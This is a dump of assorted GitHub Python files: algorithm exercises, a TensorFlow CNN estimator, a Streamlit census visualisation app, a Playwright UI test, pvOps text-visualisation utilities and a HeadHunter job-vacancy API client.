+{"seq_id":"27862413","text":"\"\"\"\r\n 将正整数排成等边三角形(也叫数塔),三角形的底边有个数,\r\n 下图给出了的一个例子。从三角形顶点出发通过一系列相邻整数(在图中用正方形表示),\r\n 如何使得到达底边时的总和最大\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n\"\"\"\r\n https://www.jianshu.com/p/2a7f5cac0d58\r\n\"\"\"\r\n\"\"\"\r\n 动态规划\r\n dp[i][j] = max(dp[i+1][j],dp[i+1][j+1])+date[i][j]\r\n\"\"\"\r\n\r\n\"\"\"\r\n (1) 初始化距离数组dp,令距离dp的最后一行复制树塔的最后一行的值\r\n (2) 从树塔倒数第二行开始,自底向上计算\r\n (3) 判断x点的左右孩子的大小,对应的距离dp = 左右孩子中的较大值加上树塔对应位置值\r\n (4) 重复2、3步骤,直到计算完树塔顶端\r\n\"\"\"\r\n\r\nclass TreePagoda(object):\r\n def __init__(self, pagoda):\r\n self.pagoda = np.array(pagoda)\r\n\r\n # 初始化节点到树塔底的距离\r\n dp = self.pagoda.copy()\r\n dp[:-1, :] = 0\r\n self.dp = dp\r\n # 下一坐标\r\n self.next = dict()\r\n\r\n def run(self):\r\n\r\n index = len(self.pagoda) - 1\r\n for j, value in enumerate(self.pagoda[-1]):\r\n yield self.getIndex(index, j), 0, value\r\n for i in range(len(self.pagoda) - 2, -1, -1): # 自底向上求得最优值\r\n layer = self.pagoda[i]\r\n for j in range(len(layer)):\r\n if layer[j] == 0:\r\n break\r\n self.find(i, j)\r\n yield self.getIndex(i, j), self.getIndex(*self.next[(i, j)]), self.dp[i, j]\r\n\r\n def getIndex(self, i, j):\r\n return int(i * (i + 1) / 2 + j)\r\n\r\n def find(self, i, j):\r\n if self.dp[i + 1, j] > self.dp[i + 1, j + 1]:\r\n self.dp[i, j] = self.dp[i + 1, j] + self.pagoda[i, j]\r\n self.next[(i, j)] = (i + 1, j)\r\n else:\r\n self.dp[i, j] = self.dp[i + 1, j + 1] + self.pagoda[i, j]\r\n self.next[(i, j)] = (i + 1, j + 1)\r\n\r\n def createdPath(self):\r\n cu = (0, 0)\r\n yield self.getIndex(*cu)\r\n while True:\r\n cu = self.next[cu]\r\n yield 
self.getIndex(*cu)\r\n            if cu[0] == len(self.pagoda) - 1:\r\n                break\r\n\r\n\r\ndef Test():\r\n    treePagoda = np.array(((9, 0, 0, 0, 0),\r\n                           (12, 15, 0, 0, 0),\r\n                           (10, 6, 8, 0, 0),\r\n                           (2, 18, 9, 5, 0),\r\n                           (19, 7, 10, 4, 16)))\r\n    t = TreePagoda(treePagoda)\r\n    y = t.run()\r\n    for i in range(15):\r\n        x = next(y)\r\n        print(x)\r\n    t.createdPath()\r\n    print(t.dp)\r\n    for i in t.createdPath():\r\n        print(i)\r\n\r\n\r\nif __name__ == '__main__':\r\n    Test()\r\n","repo_name":"Curious-chen/curriculum-design","sub_path":"algorithm/TopicB2/TreePagoda.py","file_name":"TreePagoda.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71195617848","text":"import tensorflow as tf\n\n\ndef _conv(x,kernel, name, log=False):\n    with tf.variable_scope(name):\n        W = tf.get_variable(initializer=tf.truncated_normal(shape=kernel, stddev=0.01), name='W')\n        b = tf.get_variable(initializer=tf.constant(0.0, shape=[kernel[3]]), name='b')\n        conv = tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')\n        activation = tf.nn.relu(tf.add(conv,b))\n        pool = tf.nn.max_pool(activation, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n        if log == True:\n            tf.summary.histogram(\"weights\", W)\n            tf.summary.histogram(\"biases\", b)\n            tf.summary.histogram(\"activations\", activation)\n        return pool\n\n\ndef _dense(x,size_in,size_out,name,relu=False,log=False):\n    with tf.variable_scope(name):\n        flat = tf.reshape(x, [-1, size_in])\n        W = tf.get_variable(initializer=tf.truncated_normal([size_in,size_out], stddev=0.1), name='W')\n        b = tf.get_variable(initializer=tf.constant(0.0, shape=[size_out]), name='b')\n        activation = tf.add(tf.matmul(flat, W), b)\n        if relu==True:\n            activation = tf.nn.relu(activation)\n        if log==True:\n            tf.summary.histogram(\"weights\", W)\n            tf.summary.histogram(\"biases\", b)\n            tf.summary.histogram(\"activations\", activation)\n        return activation\n    \n\ndef _model(features, mode, params):\n    input_layer = tf.reshape(features, [-1, 32, 32, 3])\n    conv1 = _conv(input_layer, kernel=[5,5,3,128], name='conv1', log=params['log'])\n    conv2 = _conv(conv1, kernel=[5,5,128,128], name='conv2', log=params['log'])\n    conv3 = _conv(conv2, kernel=[3,3,128,256], name='conv3', log=params['log'])\n    conv4 = _conv(conv3, kernel=[3,3,256,512], name='conv4', log=params['log'])\n    dense = _dense(conv4, size_in=2*2*512, size_out=params['dense_units'],\n                   name='Dense', relu=True, log=params['log'])\n    \n    if mode==tf.estimator.ModeKeys.TRAIN:\n        dense = tf.nn.dropout(dense, params['drop_out'])\n    \n    logits = _dense(dense, size_in=params['dense_units'],\n                    size_out=10, name='Output', relu=False, log=params['log'])\n    return logits\n\n\ndef model_fn(features, labels, mode, params):\n    logits = _model(features, mode, params)\n    predictions = {\"logits\": logits,\n                   \"classes\": tf.argmax(input=logits,axis=1),\n                   \"probabilities\": tf.nn.softmax(logits,name='softmax')}\n    export_outputs = {'predictions': tf.estimator.export.PredictOutput(predictions)}\n    \n    if (mode==tf.estimator.ModeKeys.TRAIN or mode==tf.estimator.ModeKeys.EVAL):\n        loss = tf.losses.sparse_softmax_cross_entropy(labels=labels,logits=logits)\n    \n    if mode == tf.estimator.ModeKeys.TRAIN:\n        learning_rate = tf.train.exponential_decay(params['learning_rate'],\n                                                   tf.train.get_global_step(),\n                                                   decay_steps=100000,\n                                                   decay_rate=0.96)\n        optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n        train_op = optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())\n        
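# log the decayed learning rate so it is visible in TensorBoard\n        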
tf.summary.scalar('learning_rate', learning_rate)\n        return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n    \n    if mode == tf.estimator.ModeKeys.EVAL:\n        accuracy = tf.metrics.accuracy(\n            labels=labels, predictions=tf.argmax(logits, axis=1))\n        metrics = {'accuracy':accuracy}\n        return tf.estimator.EstimatorSpec(mode=mode,loss=loss, eval_metric_ops=metrics)\n    \n    if mode == tf.estimator.ModeKeys.PREDICT:\n        return tf.estimator.EstimatorSpec(\n            mode=mode, predictions=predictions, export_outputs=export_outputs)\n","repo_name":"GoogleCloudPlatform/tf-estimator-tutorials","sub_path":"Experimental/distribution/multi-gpu/cmle/project/trainer/sample_model.py","file_name":"sample_model.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"77"} +{"seq_id":"46367047773","text":"\"\"\"\nTask\nGiven a number N, print the values i^2 for i from 0 to N-1\n\nInput Format\n\nN\n\nConstraints\n1<=N<=20\n\nOutput Format\n\nPrint N lines, each line containing the value i^2\n\nSample Input 0\n\n5\nSample Output 0\n\n0\n1\n4\n9\n16\n\"\"\"\n\nif __name__ == '__main__':\n    n = int(input())\n    for i in range(n):\n        print(i**2)","repo_name":"Qspace/PyOpenCVCourse","sub_path":"Code/Chapter01_BasicPython/EX_Loop.py","file_name":"EX_Loop.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"9672623275","text":"def main():\n    str1 = \"devcatoocco\"\n    str2 = \"qacatoc\"\n    print(findMaxSubArrLen(str1, str2))\n\ndef findMaxSubArrLen(str1, str2):\n    m = len(str1)\n    n = len(str2)\n    dp = [[0 for x in range(n)] for y in range(m)]\n\n    maxlen = 0\n    maxI = 0\n    for i in range(m):\n        for j in range(n):\n            if str1[i] == str2[j]:\n                if i == 0 or j == 0:\n                    dp[i][j] = 1\n                else:\n                    dp[i][j] = 1 + dp[i-1][j-1]\n                if maxlen < dp[i][j]:\n                    maxI = i\n                    maxlen = dp[i][j]\n\n    return(str1[maxI - maxlen + 1:maxI + 1])\n\nmain()\n","repo_name":"bensenberner/ctci","sub_path":"findMaxSubArr.py","file_name":"findMaxSubArr.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25334214958","text":"# Import modules\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport streamlit as st\r\n\r\n@st.cache()\r\ndef load_data():\r\n\t# Load the Adult Income dataset into DataFrame.\r\n\r\n\tdf = pd.read_csv('https://student-datasets-bucket.s3.ap-south-1.amazonaws.com/whitehat-ds-datasets/adult.csv', header=None)\r\n\tdf.head()\r\n\r\n\t# Rename the column names in the DataFrame using the list given above. \r\n\r\n\t# Create the list\r\n\tcolumn_name =['age', 'workclass', 'fnlwgt', 'education', 'education-years', 'marital-status', 'occupation', 'relationship', 'race','gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income']\r\n\r\n\t# Rename the columns using 'rename()'\r\n\tfor i in range(df.shape[1]):\r\n\t  df.rename(columns={i:column_name[i]},inplace=True)\r\n\r\n\t# Print the first five rows of the DataFrame\r\n\tdf.head()\r\n\r\n\t# Replace the invalid values ' ?' 
with 'np.nan'.\r\n\r\n\tdf['native-country'] = df['native-country'].replace(' ?',np.nan)\r\n\tdf['workclass'] = df['workclass'].replace(' ?',np.nan)\r\n\tdf['occupation'] = df['occupation'].replace(' ?',np.nan)\r\n\r\n\t# Delete the rows with invalid values and the column not required \r\n\r\n\t# Delete the rows with the 'dropna()' function\r\n\tdf.dropna(inplace=True)\r\n\r\n\t# Delete the column with the 'drop()' function\r\n\tdf.drop(columns='fnlwgt',axis=1,inplace=True)\r\n\r\n\treturn df\r\n\r\ncensus_df = load_data()\r\n\r\n# Write your code to filter streamlit warnings \r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n# Configure your home page.\r\n# Set the title to the home page contents.\r\nst.title(\"Census Visualisation App\")\r\n# Provide a brief description for the web app.\r\nst.text('''This web app allows the user to explore and visualise census data.''')\r\n\r\n# View Dataset Configuration\r\nst.header(\"View Data\")\r\n# Add an expander and display the dataset as a static table within the expander.\r\nwith st.expander(\"View Dataset\"):\r\n    st.table(census_df)\r\n\r\n# Create three beta_columns.\r\nst.subheader(\"Column's Description\")\r\ncol1 , col2 , col3= st.columns(3)\r\n# Add a checkbox in the first column. Display the column names of 'census_df' on the click of checkbox.\r\nwith col1 :\r\n    if st.checkbox(\"Show all column names\"):\r\n        st.table(list(census_df.columns))\r\n# Add a checkbox in the second column. Display the column data-types of 'census_df' on the click of checkbox.\r\ndf = pd.DataFrame({'Column Data-Type': census_df.dtypes})\r\nwith col2:\r\n\tif st.checkbox(\"View column data-types\"):\r\n\t\tst.dataframe(df)\r\n\r\n# Add a checkbox in the third column followed by a selectbox which accepts the column name whose data needs to be displayed.\r\n# Note: 'fnlwgt' is excluded from the options because it was dropped in load_data().\r\nwith col3:\r\n    if st.checkbox(\"View column data\"):\r\n        columns_data = st.selectbox(\"Select_columns\" , ('age', 'workclass', 'education', 'education-years', 'marital-status', 'occupation', 'relationship', 'race','gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income'))\r\n        if columns_data == \"age\":\r\n            st.write(census_df[\"age\"]) \r\n\r\n        elif columns_data == \"workclass\":\r\n            st.write(census_df[\"workclass\"])\r\n\r\n        elif columns_data == \"education\":\r\n            st.write(census_df[\"education\"])\r\n\r\n        elif columns_data == \"education-years\":\r\n            st.write(census_df[\"education-years\"])\r\n\r\n        elif columns_data == \"marital-status\":\r\n            st.write(census_df[\"marital-status\"])\r\n\r\n        elif columns_data == \"occupation\":\r\n            st.write(census_df[\"occupation\"])\r\n\r\n        elif columns_data == \"relationship\":\r\n            st.write(census_df[\"relationship\"])\r\n\r\n        elif columns_data == \"race\":\r\n            st.write(census_df[\"race\"])\r\n\r\n        elif columns_data == \"gender\":\r\n            st.write(census_df[\"gender\"])\r\n\r\n        elif columns_data == \"capital-gain\":\r\n            st.write(census_df[\"capital-gain\"])\r\n\r\n        elif columns_data == \"capital-loss\":\r\n            st.write(census_df[\"capital-loss\"])\r\n\r\n        elif columns_data == \"hours-per-week\":\r\n            st.write(census_df[\"hours-per-week\"]) \r\n\r\n        elif columns_data == \"native-country\":\r\n            st.write(census_df[\"native-country\"]) \r\n\r\n        else:\r\n            st.write(census_df['income'])\r\n# Display summary of the dataset on the click of 
checkbox.\r\n","repo_name":"AnkitDogra-07/multi_page","sub_path":"census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17905454420","text":"lst = [1, 3, 5]\n#lst = [6]\n#lst = []\nsum = 0\nif len(lst):\n    for i in range(0, len(lst), 2):\n        sum += lst[i]\n    print(sum * lst[-1])\nelse:\n    print(0)","repo_name":"YuriOleshko/MyHomework","sub_path":"Homework/Homework8.py","file_name":"Homework8.py","file_ext":"py","file_size_in_byte":159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29302702019","text":"def cajero():\n    saldo_cuenta = 100000\n    saldo_cajero = 1000000\n    intentos = 0\n\n    while True:\n        usuario = input(\"Ingrese el usuario: \")\n        clave = input(\"Ingrese la clave: \")\n\n        if usuario == \"10334151\" and clave == \"1803\":\n            saldo_disponible = saldo_cuenta\n            intentos = 0\n\n            while True:\n                monto = float(input(\"Ingrese el monto a retirar: \"))\n\n                if monto > saldo_disponible:\n                    print(\"Monto no permitido. El saldo disponible es:\", saldo_disponible)\n                else:\n                    saldo_cuenta -= monto\n                    saldo_cajero -= monto\n                    print(\"Retiro exitoso.\")\n                    print(\"Saldo cuenta:\", saldo_cuenta)\n                    print(\"Saldo cajero:\", saldo_cajero)\n\n                continuar = input(\"¿Desea realizar otro retiro? (S/N): \")\n\n                if continuar.upper() != \"S\":\n                    break\n\n        else:\n            intentos += 1\n            print(\"Clave inválida.\")\n            if intentos == 3:\n                print(\"Tarjeta bloqueada.\")\n                break\n\n\ncajero()\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej10/hito1_ej10_8b00fea1fb067fb1f1ea7b14f2c2e567.py","file_name":"hito1_ej10_8b00fea1fb067fb1f1ea7b14f2c2e567.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30338066826","text":"# -*- coding: utf-8 -*-\n# B - Making Triangle\n# https://atcoder.jp/contests/abc175/tasks/abc175_b\n\nN = int(input())\nL = sorted(list(map(int, input().split())))\n\nans = 0\n\nfor i in range(N):\n    for j in range(i):\n        for k in range(j):\n            if L[i] != L[j] and L[j] != L[k]:\n                if L[j] + L[k] > L[i]:\n                    ans += 1\n\nprint(ans)\n\n# 15:29 - 16:03 (read the editorial) - 16:23 (translated the C++ solution into Python)\n# 17:02 - 17:10 (AC)\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_B/ABC175B.py","file_name":"ABC175B.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"378380132","text":"from playwright.sync_api import Playwright, sync_playwright\n\n\ndef run(playwright: Playwright) -> None:\n    browser = playwright.chromium.launch(headless=False)\n    context = browser.new_context()\n\n    # Open new page\n    page = context.new_page()\n\n    # Go to https://momodel.cn/\n    page.goto(\"https://momodel.cn/\")\n\n    # Click text=数据集\n    # with page.expect_navigation(url=\"https://momodel.cn/dataset?&p=1\"):\n    with page.expect_navigation():\n        page.click(\"text=数据集\")\n    # assert page.url == \"https://momodel.cn/dataset\"\n\n    # Close page\n    page.close()\n\n    # ---------------------\n    context.close()\n    browser.close()\n\n\nwith sync_playwright() as playwright:\n    run(playwright)\n","repo_name":"WangYuJiee/Motest","sub_path":"ui_test/other/ MoSearch3.py","file_name":" MoSearch3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"17232308869","text":"# visualizations\nimport 
matplotlib\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom sklearn.metrics import ConfusionMatrixDisplay\n\n# data structures\nimport numpy as np\nimport pandas as pd\n\n# utils\nimport copy\nimport datetime\nfrom collections import Counter\n\n# Embedding\nimport nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom gensim.models.doc2vec import TaggedDocument\nfrom nltk.tokenize import word_tokenize\n\n\ndef visualize_attribute_connectivity(\n om_df,\n om_col_dict,\n figsize=(40, 20),\n attribute_colors=[\"lightgreen\", \"cornflowerblue\"],\n edge_width_scalar=10,\n graph_aargs={},\n):\n \"\"\"Visualize a knowledge graph which shows the frequency of combinations between attributes\n ``ATTRIBUTE1_COL`` and ``ATTRIBUTE2_COL``\n\n Parameters\n ----------\n om_df : DataFrame\n A pandas dataframe containing O&M data, which contains columns specified in om_col_dict\n om_col_dict : dict of {str : str}\n A dictionary that contains the column names to be used in\n visualization::\n\n {\n 'attribute1_col' : string,\n 'attribute2_col' : string\n }\n\n figsize : tuple\n Figure size\n attribute_colors : list\n List of two strings which designate the colors for Attribute1 and Attribute 2, respectively.\n edge_width_scalar : numeric\n Weight utilized to cause dynamic widths based on number of connections between Attribute 1\n and Attribute 2.\n graph_aargs : dict\n Optional, arguments passed to networkx graph drawer.\n Suggested attributes to pass:\n\n - with_labels=True\n - font_weight='bold'\n - node_size=19000\n - font_size=35\n - node_color='darkred'\n - font_color='red'\n\n Returns\n -------\n Matplotlib figure instance,\n networkx EdgeView object\n i.e. [('A', 'X'), ('X', 'B'), ('C', 'Y'), ('C', 'Z')]\n \"\"\"\n df = om_df.copy()\n ATTRIBUTE1_COL = om_col_dict[\"attribute1_col\"]\n ATTRIBUTE2_COL = om_col_dict[\"attribute2_col\"]\n\n nx_data = []\n for a in np.unique(df[ATTRIBUTE1_COL].tolist()):\n df_iter = df[df[ATTRIBUTE1_COL] == a]\n for i in np.unique(df_iter[ATTRIBUTE2_COL].tolist()):\n w = len(df_iter[df_iter[ATTRIBUTE2_COL] == i])\n nx_data.append([a, i, w])\n\n unique_df = pd.DataFrame(\n nx_data, columns=[ATTRIBUTE1_COL, ATTRIBUTE2_COL, \"w\"])\n\n G = nx.from_pandas_edgelist(unique_df, ATTRIBUTE1_COL, ATTRIBUTE2_COL, \"w\")\n fig = plt.figure(figsize=figsize)\n fig.suptitle(\n f\"Connectivity between {ATTRIBUTE1_COL} and {ATTRIBUTE2_COL}\",\n fontsize=50,\n y=1.08,\n fontweight=\"bold\",\n )\n\n color_map = []\n for node in G:\n if node in np.unique(df[ATTRIBUTE2_COL].tolist()):\n color_map.append(attribute_colors[1])\n else:\n color_map.append(attribute_colors[0])\n\n edges = G.edges()\n weights = [G[u][v][\"w\"] for u, v in edges]\n weights = np.array(weights)\n weights = list(1 + (edge_width_scalar * weights /\n weights.max())) # scale 1-11\n nx.draw_shell(G, width=weights, node_color=color_map, **graph_aargs)\n\n return fig, edges\n\n\ndef visualize_attribute_timeseries(\n om_df, om_col_dict, date_structure=\"%Y-%m\", figsize=(12, 6), cmap_name=\"brg\"\n):\n \"\"\"Visualize stacked bar chart of attribute frequency over time, where x-axis is time and y-axis is count, displaying separate bars\n for each label within the label column\n\n Parameters\n ----------\n om_df : DataFrame\n A pandas dataframe of O&M data, which contains columns in om_col_dict\n om_col_dict : dict of {str : str}\n A dictionary that contains the column names relevant for the get_dates fn\n\n - **label** (*string*), should be assigned to associated column name for the 
label/attribute of interest in om_df\n - **date** (*string*), should be assigned to associated column name for the dates relating to the documents in om_df\n\n date_structure : str\n Controls the resolution of the bar chart's timeseries\n Default : \"%Y-%m\". Can change to include finer resolutions (e.g., by including day, \"%Y-%m-%d\")\n or coarser resolutions (e.g., by year, \"%Y\")\n figsize : tuple\n Optional, figure size\n cmap_name : str\n Optional, color map name in matplotlib\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n df = om_df.copy()\n LABEL_COLUMN = om_col_dict[\"label\"]\n DATE_COLUMN = om_col_dict[\"date\"]\n\n def restructure(vals, inds, ind_set):\n out = np.zeros(len(ind_set))\n for ind, val in zip(inds, vals):\n loc = ind_set.index(ind)\n out[loc] = val\n return out\n\n fig = plt.figure(figsize=figsize)\n asset_set = list(set(df[LABEL_COLUMN].tolist()))\n\n dates = df[DATE_COLUMN].tolist()\n assets_list = df[LABEL_COLUMN].tolist()\n\n full_date_list = [i.strftime(date_structure) for i in dates]\n datetime_list = [\n datetime.datetime.strptime(i, date_structure) for i in full_date_list\n ]\n date_set = list(set(datetime_list))\n date_set = sorted(date_set)\n date_set = [i.strftime(date_structure) for i in date_set]\n assets_list = np.array(assets_list)\n\n asset_sums = []\n index_sums = []\n for dt in date_set:\n inds = [i for i, x in enumerate(full_date_list) if x == dt]\n alist = assets_list[inds]\n\n index_sums += [dt] * len(alist)\n asset_sums += list(alist)\n\n asset_set = list(set(asset_sums))\n\n newdf = pd.DataFrame()\n newdf[LABEL_COLUMN] = asset_sums\n newdf[DATE_COLUMN] = index_sums\n\n cmap = matplotlib.colormaps.get_cmap(cmap_name).resampled(len(asset_set))\n\n graphs = []\n for i, a in enumerate(asset_set):\n iter_ = newdf[newdf[LABEL_COLUMN] == a]\n valcounts = iter_[DATE_COLUMN].value_counts()\n valcounts.sort_index(inplace=True)\n vals = restructure(valcounts.values, valcounts.index, date_set)\n p = plt.bar(date_set, vals, color=cmap(i))\n graphs.append(p[0])\n\n plt.legend(graphs, list(asset_set))\n plt.xlabel(\"Month\")\n plt.ylabel(f\"Affected {LABEL_COLUMN} counts\")\n plt.xticks(rotation=45)\n return fig\n\n\ndef visualize_cluster_entropy(\n doc2vec, eval_kmeans, om_df, data_cols, ks, cmap_name=\"brg\"\n):\n \"\"\"Visualize entropy of embedding space parition. Currently only supports doc2vec embedding.\n\n Parameters\n ----------\n doc2vec : Doc2Vec model instance\n Instance of gensim.models.doc2vec.Doc2Vec\n eval_kmeans : callable\n Callable cluster fit function\n For instance,\n\n .. 
code-block:: python\n\n def eval_kmeans(X,k):\n km = KMeans(n_clusters=k)\n km.fit(X)\n return km\n\n om_df : DataFrame\n A pandas dataframe containing O&M data, which contains columns specified in om_col_dict\n data_cols : list\n List of column names (str) which have text data.\n ks : list\n List of k parameters required for the clustering mechanic `eval_kmeans`\n cmap_name :\n Optional, color map\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n df = om_df.copy()\n cols = data_cols\n\n fig = plt.figure(figsize=(6, 6))\n cmap = plt.cm.get_cmap(cmap_name, len(cols) * 2)\n\n for i, col in enumerate(cols):\n X = df[col].tolist()\n X = [x.lower() for x in X]\n\n tokenized_data = [word_tokenize(x) for x in X]\n\n doc2vec_data = [\n TaggedDocument(words=x, tags=[str(i)]) for i, x in enumerate(tokenized_data)\n ]\n model = copy.deepcopy(doc2vec)\n model.build_vocab(doc2vec_data)\n model.train(\n doc2vec_data, total_examples=model.corpus_count, epochs=model.epochs\n )\n X_doc2vec = [model.infer_vector(tok_doc) for tok_doc in tokenized_data]\n\n sse = []\n clusters = []\n for true_k in ks:\n km = eval_kmeans(X_doc2vec, true_k)\n sse.append(km.inertia_)\n clusters.append(km.labels_)\n plt.plot(\n ks, sse, color=cmap(2 * i), marker=\"o\", label=f\"Doc2Vec + {col} entropy\"\n )\n\n vectorizer = TfidfVectorizer()\n X_tfidf = vectorizer.fit_transform(X)\n\n sse = []\n clusters = []\n for true_k in ks:\n km = eval_kmeans(X_tfidf, true_k)\n sse.append(km.inertia_)\n clusters.append(km.labels_)\n plt.plot(\n ks, sse, color=cmap(2 * i + 1), marker=\"o\", label=f\"TF-IDF + {col} entropy\"\n )\n\n plt.xlabel(r\"Number of clusters *k*\")\n plt.ylabel(\"Sum of squared distance\")\n plt.legend()\n\n return fig\n\n\ndef visualize_document_clusters(cluster_tokens, min_frequency=20):\n \"\"\"Visualize words most frequently occurring in a cluster. 
Especially useful when visualizing\n    the results of an unsupervised partitioning of documents.\n\n    Parameters\n    ----------\n    cluster_tokens : list\n        List of tokenized documents\n    min_frequency : int\n        Minimum number of occurrences that a word must have in a cluster for it to be visualized\n\n    Returns\n    -------\n    Matplotlib figure instance\n    \"\"\"\n    # IDEA: instead of using frequency, use importance with other embeddings too\n    all_tokens = [item for sublist in cluster_tokens for item in sublist]\n    # important_words_freq is [[word1,freq1],[word2,freq2],...]\n    total_important_words_freq = Counter(all_tokens).most_common()\n    word_freq_df = pd.DataFrame(\n        total_important_words_freq, columns=[\"word\", \"freq\"])\n\n    words_of_interest_per_cluster = []\n    for tokens in cluster_tokens:\n        # important_words_freq is [[word1,freq1],[word2,freq2],...]\n        important_words_freq = Counter(tokens).most_common()\n        cluster_words = [word for word, freq in important_words_freq if freq >= min_frequency]\n        words_of_interest_per_cluster.append(cluster_words)\n\n    all_words_of_interest = [word for cluster_words in words_of_interest_per_cluster for word in cluster_words]\n\n    unique_words = np.unique(all_words_of_interest)\n\n    cluster_list = []\n    freq_list = []\n    word_list = []\n    for wd in unique_words:\n        freq = word_freq_df[word_freq_df[\"word\"] == wd][\"freq\"].tolist()[0]\n        # indices of the clusters whose frequent words include this word\n        clusters_this_wd = [\n            idx\n            for idx, words_in_cluster in enumerate(words_of_interest_per_cluster)\n            if wd in words_in_cluster\n        ]\n        clusters_this_wd = list(map(str, clusters_this_wd))\n        cluster_list.append(\", \".join(clusters_this_wd))\n        freq_list.append(freq)\n        word_list.append(wd)\n\n    # fig = plt.figure(figsize=(10,20))\n\n    filter_cluster_list = []\n    filter_freq_list = []\n    filter_word_list = []\n    for fr, cl, wd in sorted(zip(freq_list, cluster_list, word_list)):\n        filter_cluster_list.append(cl)\n        filter_freq_list.append(fr)\n        filter_word_list.append(wd)\n\n    df = pd.DataFrame(index=filter_cluster_list)\n    df[\"freq\"] = filter_freq_list\n    ax = df[\"freq\"].plot(kind=\"barh\", figsize=(\n        20, 14), color=\"coral\", fontsize=13)\n\n    xbias = 0.3\n    ybias = 0.0\n    for idx, i in enumerate(ax.patches):\n        ax.text(\n            i.get_width() + xbias,\n            i.get_y() + ybias,\n            filter_word_list[idx],\n            fontsize=15,\n            color=\"dimgrey\",\n        )\n\n    return ax\n\n\ndef visualize_word_frequency_plot(\n    tokenized_words, title=\"\", font_size=16, graph_aargs={}\n):\n    \"\"\"Visualize the frequency distribution of words within a set of documents\n\n    Parameters\n    ----------\n    tokenized_words : list\n        List of tokenized words\n    title : str\n        
Optional, title of plot\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n act_col = col_dict['attribute_col']\n pred_col = col_dict['predicted_col']\n\n # drop any predicted labels with no actual labels in the data, for a cleaner visual\n no_real_values = [cat for cat in om_df[pred_col].unique() if cat not in om_df[act_col].unique()]\n no_real_values_mask = om_df[pred_col].isin(no_real_values)\n om_df = om_df[~no_real_values_mask]\n caption_txt = f'NOTE: Predicted values{no_real_values} had no actual values in the dataset.'\n\n plt.rcParams.update({'font.size': 8})\n cm_display = ConfusionMatrixDisplay.from_predictions(y_true=om_df[act_col],\n y_pred=om_df[pred_col],\n normalize='true',\n )\n fig = cm_display.plot()\n plt.xticks(rotation=90)\n plt.tight_layout()\n plt.figtext(0.00, 0.01, caption_txt, wrap=True, fontsize=7)\n plt.title(title)\n return fig\n","repo_name":"sandialabs/pvOps","sub_path":"pvops/text/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":13783,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"877178810","text":"import json\n\nimport requests\n\n\ndef get_all_employers(word: str) -> [dict]:\n \"\"\" Return list of dicts, includes all employers upon word for search\"\"\"\n\n # Defining entering data\n param: dict = {'text': word,\n 'page': 0,\n 'per_page': 100}\n\n # pulling info from Headhunter and transform it in json format\n request = requests.get('https://api.hh.ru/employers', param)\n\n data = request.content.decode()\n json_object: dict = json.loads(data)['items']\n return json_object\n\n\ndef print_message_employers(employers_list) -> None:\n \"\"\" Printing all employers, who do have open vacancies\"\"\"\n\n # If list of dicts is not empty\n if len(employers_list) > 0:\n\n # Setting id for employer, then it will be used by user to choose employer\n employer_id: int = 0\n for employer in employers_list:\n if employer[\"open_vacancies\"] == 0:\n continue\n employer_id += 1\n print(f'{employer_id} Company name: {employer[\"name\"]}\\n '\n f'Amount of open vacancies: {employer[\"open_vacancies\"]}\\n')\n else:\n print('No employers are found')\n\n\ndef get_employer(employer: str, employers_list: [dict]) -> [dict]:\n \"\"\" Return vacancies for chosen Employer. 
If no such Employer, return message\"\"\"\n\n # Defining entering data\n param = {'page': 0,\n 'per_page': 100}\n\n # Set empty list, where employers with open vacancies will be added\n final_employers_list: list = []\n\n for chosen_employer in employers_list:\n if chosen_employer[\"open_vacancies\"] != 0:\n final_employers_list.append(chosen_employer)\n\n # pulling info from Headhunter and transform it in json format\n # Request is performed by index in final_employers_list, 'employer' is a value, set by user\n request = requests.get(final_employers_list[int(employer) - 1][\"vacancies_url\"], param)\n data = request.content.decode()\n json_object: dict = json.loads(data)\n return json_object['items']\n\n\ndef print_message_vacancies(chosen_employer: [dict]) -> None:\n \"\"\" Printing info about vacancies\"\"\"\n\n try:\n for vacancy in chosen_employer:\n if vacancy['salary'] is None:\n vacancy['salary'] = {'from': None, 'to': None}\n if vacancy['salary'].get('from') is None:\n vacancy[\"salary\"][\"from\"] = 